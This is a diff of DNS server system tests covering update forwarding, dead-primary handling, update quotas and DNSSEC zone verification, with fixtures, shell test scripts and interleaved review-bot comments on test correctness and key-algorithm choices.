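Review bot: The header comment describes a server that answers from patterns loaded over a control connection on port 5301, but the main loop at the end of this file only receives a UDP datagram or drains a TCP connection and never replies, so `@rules` is never filled and `handleUDP`, `handleTCP`, `namelen`, `packetlen` and `sign_tcp_continuation` are never called. The `nomaster` zone in ns3/named1.conf.in points at 10.53.0.4 and tests.sh treats it as a dead primary, so the header should say that instead, e.g. `# This server accepts UDP and TCP queries on 10.53.0.4 and never answers them.`, and the unused subs can be dropped. If they are kept, both handlers print `$key_data` to the log and interpolate the rule pattern into a regex unescaped, which would matter as soon as a control channel fills `@rules` again.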
@@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f dig.out.ns1* dig.out.ns2 dig.out.ns1 dig.out.ns3 dig.out.ns1.after +rm -f ns1/*.jnl ns2/*.jnl ns3/*.jnl ns1/example.db ns2/*.bk ns3/*.bk +rm -f ns3/nomaster1.db +rm -f ns3/dnstap.out* +rm -f ns3/dnstap.conf +rm -f dnstap.out* +rm -f dnstapread.out* +rm -f */named.memstats +rm -f */named.run +rm -f */named.conf +rm -f */ans.run +rm -f Ksig0.example2.* +rm -f keyname keyname.err +rm -f ns*/named.lock +rm -f ns1/example2.db +rm -f ns*/managed-keys.bind* +rm -f nsupdate.out.* +rm -f ns*/named.run.prev diff --git a/bin/tests/system/upforwd/knowngood.after1 b/bin/tests/system/upforwd/knowngood.after1 new file mode 100644 index 0000000..7fc424c --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.after1 @@ -0,0 +1,10 @@ +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 2 3600 1200 604800 7200 +example. 3600 IN NS ns2.example. +example. 3600 IN NS ns3.example. +ns1.example. 3600 IN A 10.53.0.1 +ns2.example. 3600 IN A 10.53.0.2 +ns3.example. 3600 IN A 10.53.0.3 +updated.example. 600 IN TXT "Foo" +updated.example. 600 IN A 10.10.10.1 +example. 3600 IN SOA n1.example. hostmaster.ns1.example. 2 3600 1200 604800 7200 + diff --git a/bin/tests/system/upforwd/knowngood.after2 b/bin/tests/system/upforwd/knowngood.after2 new file mode 100644 index 0000000..eab7a2c --- /dev/null +++ b/bin/tests/system/upforwd/knowngood.after2 
@@ -0,0 +1,11 @@
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 3 3600 1200 604800 7200
+example. 3600 IN NS ns2.example.
+example. 3600 IN NS ns3.example.
+ns1.example. 3600 IN A 10.53.0.1
+ns2.example. 3600 IN A 10.53.0.2
+ns3.example. 3600 IN A 10.53.0.3
+unsigned.example. 600 IN TXT "Foo"
+unsigned.example. 600 IN A 10.10.10.1
+updated.example. 600 IN TXT "Foo"
+updated.example. 600 IN A 10.10.10.1
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 3 3600 1200 604800 7200
diff --git a/bin/tests/system/upforwd/knowngood.before b/bin/tests/system/upforwd/knowngood.before
new file mode 100644
index 0000000..4bde819
--- /dev/null
+++ b/bin/tests/system/upforwd/knowngood.before
@@ -0,0 +1,8 @@
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200
+example. 3600 IN NS ns2.example.
+example. 3600 IN NS ns3.example.
+ns1.example. 3600 IN A 10.53.0.1
+ns2.example. 3600 IN A 10.53.0.2
+ns3.example. 3600 IN A 10.53.0.3
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200
+
diff --git a/bin/tests/system/upforwd/knowngood.ns2.before b/bin/tests/system/upforwd/knowngood.ns2.before
new file mode 100644
index 0000000..bb3c355
--- /dev/null
+++ b/bin/tests/system/upforwd/knowngood.ns2.before
@@ -0,0 +1,6 @@
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200
+example. 3600 IN NS ns2.example.
+ns1.example. 3600 IN A 10.53.0.1
+ns2.example. 3600 IN A 10.53.0.2
+example. 3600 IN SOA n1.example. hostmaster.ns1.example. 1 3600 1200 604800 7200
+
diff --git a/bin/tests/system/upforwd/ns1/example1.db b/bin/tests/system/upforwd/ns1/example1.db
new file mode 100644
index 0000000..04c47f2
--- /dev/null
+++ b/bin/tests/system/upforwd/ns1/example1.db
@@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA n1.example. hostmaster.ns1.example. ( + 1 3600 1200 604800 7200 ) + NS ns2.example. + NS ns3.example. +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 diff --git a/bin/tests/system/upforwd/ns1/named.conf.in b/bin/tests/system/upforwd/ns1/named.conf.in new file mode 100644 index 0000000..c2b57dd --- /dev/null +++ b/bin/tests/system/upforwd/ns1/named.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key "update.example." { + algorithm "hmac-md5"; + secret "c3Ryb25nIGVub3VnaCBmb3IgYSBtYW4gYnV0IG1hZGUgZm9yIGEgd29tYW4K"; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "example" { + type primary; + file "example.db"; + allow-update { key update.example.; 10.53.0.3; }; +}; + +zone "example2" { + type primary; + file "example2.db"; + allow-update { key sig0.example2.; }; +}; diff --git a/bin/tests/system/upforwd/ns2/named.conf.in b/bin/tests/system/upforwd/ns2/named.conf.in new file mode 100644 index 0000000..dd2de8b 
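Review bot: The `update.example.` key in ns1/named.conf.in is pinned to `algorithm "hmac-md5";`, and the `rndc_key` in ns3/named1.conf.in is pinned to `hmac-sha256`, while ns3/named2.conf.in in the same commit takes `algorithm @DEFAULT_HMAC@;`. A build where MD5 is unavailable would presumably fail to load the ns1 key, so this fixture should use the placeholder too: `algorithm @DEFAULT_HMAC@;`. The signed update in upforwd/tests.sh passes `-y update.example:<secret>` with no algorithm prefix and would need a matching `${DEFAULT_HMAC}:` prefix, assuming conf.sh exports that variable.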
--- /dev/null +++ b/bin/tests/system/upforwd/ns2/named.conf.in @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; +}; + +zone "example" { + type secondary; + file "example.bk"; + primaries { 10.53.0.1; }; +}; + +zone "example2" { + type secondary; + file "example2.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/upforwd/ns3/named1.conf.in b/bin/tests/system/upforwd/ns3/named1.conf.in new file mode 100644 index 0000000..61d42c8 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/named1.conf.in 
@@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + include "dnstap.conf"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type secondary; + file "example.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "example2" { + type secondary; + file "example2.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "example3" { + type secondary; + file "example3.bk"; + allow-update-forwarding { 10.53.0.1; }; + primaries { 10.53.0.1; }; +}; + +zone "nomaster" { + type secondary; + file "nomaster1.db"; + allow-update-forwarding { any; }; + masterfile-format text; + primaries { 10.53.0.4; }; +}; diff --git a/bin/tests/system/upforwd/ns3/named2.conf.in b/bin/tests/system/upforwd/ns3/named2.conf.in new file mode 100644 index 0000000..86d7469 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/named2.conf.in 
@@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + update-quota 1; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm @DEFAULT_HMAC@; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example" { + type secondary; + file "example.bk"; + allow-update-forwarding { any; }; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/upforwd/ns3/nomaster.db b/bin/tests/system/upforwd/ns3/nomaster.db new file mode 100644 index 0000000..c27e154 --- /dev/null +++ b/bin/tests/system/upforwd/ns3/nomaster.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 SOA . . 141235 3600 1200 86400 1200 +@ 0 NS ns4 +ns4 0 A 10.53.0.4 diff --git a/bin/tests/system/upforwd/prereq.sh b/bin/tests/system/upforwd/prereq.sh new file mode 100644 index 0000000..ec369f8 --- /dev/null +++ b/bin/tests/system/upforwd/prereq.sh 
@@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi diff --git a/bin/tests/system/upforwd/setup.sh b/bin/tests/system/upforwd/setup.sh new file mode 100644 index 0000000..c7c9afc --- /dev/null +++ b/bin/tests/system/upforwd/setup.sh 
@@ -0,0 +1,48 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp -f ns1/example1.db ns1/example.db +cp -f ns3/nomaster.db ns3/nomaster1.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf + +if $FEATURETEST --enable-dnstap +then + cat <<'EOF' > ns3/dnstap.conf + dnstap-identity "ns3"; + dnstap-version "xxx"; + dnstap-output file "dnstap.out"; + dnstap { all; }; +EOF +else + echo "/* DNSTAP NOT ENABLED */" >ns3/dnstap.conf +fi + + +# +# SIG(0) required cryptographic support which may not be configured. +# +keyname=$($KEYGEN -q -n HOST -a ${DEFAULT_ALGORITHM} -b 1024 -T KEY sig0.example2 2>keyname.err) +if test -n "$keyname" +then + cat ns1/example1.db $keyname.key > ns1/example2.db + echo $keyname > keyname +else + cat ns1/example1.db > ns1/example2.db +fi +cat_i < keyname.err diff --git a/bin/tests/system/upforwd/tests.sh b/bin/tests/system/upforwd/tests.sh new file mode 100644 index 0000000..35c5588 --- /dev/null +++ b/bin/tests/system/upforwd/tests.sh 
@@ -0,0 +1,294 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# ns1 = stealth primary +# ns2 = secondary with update forwarding disabled; not currently used +# ns3 = secondary with update forwarding enabled + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -p ${CONTROLPORT} -c ../common/rndc.conf" + +status=0 +n=1 +capture_dnstap() { + retry_quiet 20 test -f ns3/dnstap.out && mv ns3/dnstap.out dnstap.out.$n + $RNDCCMD -s 10.53.0.3 dnstap -reopen +} + +uq_equals_ur() { + "$DNSTAPREAD" dnstap.out.$n | + awk '$3 == "UQ" { UQ+=1 } $3 == "UR" { UR += 1 } END { print UQ+0, UR+0 }' > dnstapread.out$n + read UQ UR < dnstapread.out$n + echo_i "UQ=$UQ UR=$UR" + test $UQ -eq $UR || return 1 +} + +echo_i "waiting for servers to be ready for testing ($n)" +for i in 1 2 3 4 5 6 7 8 9 10 +do + ret=0 + $DIG +tcp -p ${PORT} example. @10.53.0.1 soa > dig.out.ns1 || ret=1 + grep "status: NOERROR" dig.out.ns1 > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example. @10.53.0.2 soa > dig.out.ns2 || ret=1 + grep "status: NOERROR" dig.out.ns2 > /dev/null || ret=1 + $DIG +tcp -p ${PORT} example. 
@10.53.0.3 soa > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + test $ret = 0 && break + sleep 1 +done +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching primary copy of zone before update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 1 copy of zone before update ($n)" +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 2 copy of zone before update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "comparing pre-update copies to known good data ($n)" +ret=0 +digcomp knowngood.before dig.out.ns1 || ret=1 +digcomp knowngood.before dig.out.ns2 || ret=1 +digcomp knowngood.before dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "updating zone (signed) ($n)" +ret=0 +$NSUPDATE -y update.example:c3Ryb25nIGVub3VnaCBmb3IgYSBtYW4gYnV0IG1hZGUgZm9yIGEgd29tYW4K -- - <<EOF || ret=1 +local 10.53.0.1 +server 10.53.0.3 ${PORT} +update add updated.example. 600 A 10.10.10.1 +update add updated.example. 
600 TXT Foo +send +EOF +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "sleeping 15 seconds for server to incorporate changes" +sleep 15 + +echo_i "fetching primary copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 1 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "fetching secondary 2 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "comparing post-update copies to known good data ($n)" +ret=0 +digcomp knowngood.after1 dig.out.ns1 || ret=1 +digcomp knowngood.after1 dig.out.ns2 || ret=1 +digcomp knowngood.after1 dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "checking 'forwarding update for zone' is logged ($n)" +ret=0 +grep "forwarding update for zone 'example/IN'" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +echo_i "updating zone (unsigned) ($n)" +ret=0 +$NSUPDATE -- - <<EOF || ret=1 +local 10.53.0.1 +server 10.53.0.3 ${PORT} +update add unsigned.example. 600 A 10.10.10.1 +update add unsigned.example. 
600 TXT Foo +send +EOF +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "sleeping 15 seconds for server to incorporate changes" +sleep 15 + +echo_i "fetching primary copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.1 axfr > dig.out.ns1 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "fetching secondary 1 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.2 axfr > dig.out.ns2 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +echo_i "fetching secondary 2 copy of zone after update ($n)" +ret=0 +$DIG $DIGOPTS example.\ + @10.53.0.3 axfr > dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +echo_i "comparing post-update copies to known good data ($n)" +ret=0 +digcomp knowngood.after2 dig.out.ns1 || ret=1 +digcomp knowngood.after2 dig.out.ns2 || ret=1 +digcomp knowngood.after2 dig.out.ns3 || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi +n=`expr $n + 1` + +echo_i "checking update forwarding to dead primary ($n)" +count=0 +ret=0 +while [ $count -lt 5 -a $ret -eq 0 ] +do +( +$NSUPDATE -- - <<EOF +local 10.53.0.1 +server 10.53.0.3 ${PORT} +zone nomaster +update add unsigned.nomaster. 600 A 10.10.10.1 +update add unsigned.nomaster. 600 TXT Foo +send +EOF +) > /dev/null 2>&1 & + $DIG -p ${PORT} +noadd +notcp +noauth nomaster. 
@10.53.0.3 soa > dig.out.ns3 || ret=1 + grep "status: NOERROR" dig.out.ns3 > /dev/null || ret=1 + count=`expr $count + 1` +done +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +if $FEATURETEST --enable-dnstap +then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur && ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` +fi + +if test -f keyname +then + echo_i "checking update forwarding to with sig0 ($n)" + ret=0 + keyname=`cat keyname` + $NSUPDATE -k $keyname.private -- - <<EOF + local 10.53.0.1 + server 10.53.0.3 ${PORT} + zone example2 + update add unsigned.example2. 600 A 10.10.10.1 + update add unsigned.example2. 600 TXT Foo + send +EOF + $DIG -p ${PORT} unsigned.example2 A @10.53.0.1 > dig.out.ns1.test$n + grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` + + if $FEATURETEST --enable-dnstap + then + echo_i "checking DNSTAP logging of UPDATE forwarded update replies ($n)" + ret=0 + capture_dnstap + uq_equals_ur || ret=1 + if [ $ret != 0 ] ; then echo_i "failed"; fi + status=`expr $status + $ret` + n=`expr $n + 1` + fi +fi + +echo_i "attempting an update that should be rejected by ACL ($n)" +ret=0 +{ + $NSUPDATE -- - << EOF + local 10.53.0.2 + server 10.53.0.3 ${PORT} + update add another.unsigned.example. 600 A 10.10.10.2 + update add another.unsigned.example. 600 TXT Bar + send +EOF +} > nsupdate.out.$n 2>&1 +grep REFUSED nsupdate.out.$n > /dev/null || ret=1 +if [ $ret != 0 ] ; then echo_i "failed"; status=`expr $status + $ret`; fi +n=`expr $n + 1` + +n=$((n + 1)) +ret=0 +echo_i "attempting updates that should exceed quota ($n)" +# lower the update quota to 1. 
+copy_setports ns3/named2.conf.in ns3/named.conf +rndc_reconfig ns3 10.53.0.3 +nextpart ns3/named.run > /dev/null +for loop in 1 2 3 4 5 6 7 8 9 10; do +{ + $NSUPDATE -- - > /dev/null 2>&1 <<END + local 10.53.0.1 + server 10.53.0.3 ${PORT} + update add txt-$loop.unsigned.example 300 IN TXT Whatever + send +END +} & +done +wait_for_log 10 "too many DNS UPDATEs queued" ns3/named.run || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/verify/clean.sh b/bin/tests/system/verify/clean.sh new file mode 100644 index 0000000..767ca77 --- /dev/null +++ b/bin/tests/system/verify/clean.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.lock +rm -f verify.out* +rm -f zones/*.bad +rm -f zones/*.good +rm -f zones/*.out* +rm -f zones/*.tmp +rm -f zones/K* +rm -f zones/dsset-* diff --git a/bin/tests/system/verify/setup.sh b/bin/tests/system/verify/setup.sh new file mode 100644 index 0000000..55022b9 --- /dev/null +++ b/bin/tests/system/verify/setup.sh 
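Review bot: `uq_equals_ur` in upforwd/tests.sh succeeds when nothing was captured: if `capture_dnstap` times out and `dnstap.out.$n` is missing or empty, the exit status of `$DNSTAPREAD` is discarded by the pipeline, awk prints `0 0`, and `test $UQ -eq $UR` is true. The three positive dnstap checks therefore cannot fail on an empty capture; require at least one query with `test "$UQ" -gt 0 && test "$UQ" -eq "$UR" || return 1`. The dead-primary check (`uq_equals_ur && ret=1`) would then pass on an empty capture, so it should assert a non-zero `UQ` itself. Separately, the sig0 `$NSUPDATE -k $keyname.private` call has no `|| ret=1`, and `n` is incremented twice in a row before the quota test.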
@@ -0,0 +1,17 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+(cd zones && $SHELL genzones.sh)
diff --git a/bin/tests/system/verify/tests.sh b/bin/tests/system/verify/tests.sh
new file mode 100644
index 0000000..cda891a
--- /dev/null
+++ b/bin/tests/system/verify/tests.sh
@@ -0,0 +1,112 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh +failed () { + cat verify.out.$n | sed 's/^/D:/'; + echo_i "failed"; + status=1; +} + +n=0 +status=0 + +for file in zones/*.good +do + n=`expr $n + 1` + zone=`expr "$file" : 'zones/\(.*\).good'` + echo_i "checking supposedly good zone: $zone ($n)" + ret=0 + case $zone in + zsk-only.*) only=-z;; + ksk-only.*) only=-z;; + *) only=;; + esac + $VERIFY ${only} -o $zone $file > verify.out.$n 2>&1 || ret=1 + [ $ret = 0 ] || failed +done + +for file in zones/*.bad +do + n=`expr $n + 1` + zone=`expr "$file" : 'zones/\(.*\).bad'` + echo_i "checking supposedly bad zone: $zone ($n)" + ret=0 + dumpit=0 + case $zone in + zsk-only.*) only=-z;; + ksk-only.*) only=-z;; + *) only=;; + esac + expect1= expect2= + case $zone in + *.dnskeyonly) + expect1="DNSKEY is not signed" + ;; + *.expired) + expect1="signature has expired" + expect2="No self-signed .*DNSKEY found" + ;; + *.ksk-expired) + expect1="signature has expired" + expect2="No self-signed .*DNSKEY found" + ;; + *.out-of-zone-nsec|*.below-bottom-of-zone-nsec|*.below-dname-nsec) + expect1="unexpected NSEC RRset at" + ;; + *.nsec.broken-chain) + expect1="Bad NSEC record for.*, next name mismatch" + ;; + *.bad-bitmap) + expect1="bit map mismatch" + ;; + *.missing-empty) + expect1="Missing NSEC3 record for"; + ;; + unsigned) + expect1="Zone contains no DNSSEC keys" + ;; + *.extra-nsec3) + expect1="Expected and found NSEC3 chains not equal"; + ;; + *) + dumpit=1 + ;; + esac + $VERIFY ${only} -o $zone $file > verify.out.$n 2>&1 && ret=1 + grep 
"${expect1:-.}" verify.out.$n > /dev/null || ret=1 + grep "${expect2:-.}" verify.out.$n > /dev/null || ret=1 + [ $ret = 0 ] || failed + [ $dumpit = 1 ] && cat verify.out.$n +done + +n=`expr $n + 1` +echo_i "checking error message when -o is not used and a SOA record not at top of zone is found ($n)" +ret=0 +# When -o is not used, origin is set to zone file name, which should cause an error in this case +$VERIFY zones/ksk+zsk.nsec.good > verify.out.$n 2>&1 && ret=1 +grep "not at top of zone" verify.out.$n > /dev/null || ret=1 +grep "use -o to specify a different zone origin" verify.out.$n > /dev/null || ret=1 +[ $ret = 0 ] || failed + +n=`expr $n + 1` +echo_i "checking error message when an invalid -o is specified and a SOA record not at top of zone is found ($n)" +ret=0 +$VERIFY -o invalid.origin zones/ksk+zsk.nsec.good > verify.out.$n 2>&1 && ret=1 +grep "not at top of zone" verify.out.$n > /dev/null || ret=1 +grep "use -o to specify a different zone origin" verify.out.$n > /dev/null && ret=1 +[ $ret = 0 ] || failed + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/verify/zones/genzones.sh b/bin/tests/system/verify/zones/genzones.sh new file mode 100644 index 0000000..d0ab4e5 --- /dev/null +++ b/bin/tests/system/verify/zones/genzones.sh 
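Review bot: The default branch of the second `case $zone in` in the `zones/*.bad` loop sets only `dumpit=1`, so `expect1` and `expect2` stay empty and both greps fall back to the pattern `.`, which matches any non-empty output. A bad zone whose name matches none of the listed patterns therefore passes as soon as `$VERIFY` exits non-zero and prints anything at all, including an abnormal exit, without checking that the zone was rejected for the intended reason. For a DNSSEC verification test I would make the unlisted case a failure, e.g. `*) echo_i "no expected message for $zone"; ret=1; dumpit=1 ;;`, so a new `.bad` zone cannot be added without stating what the verifier should report.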
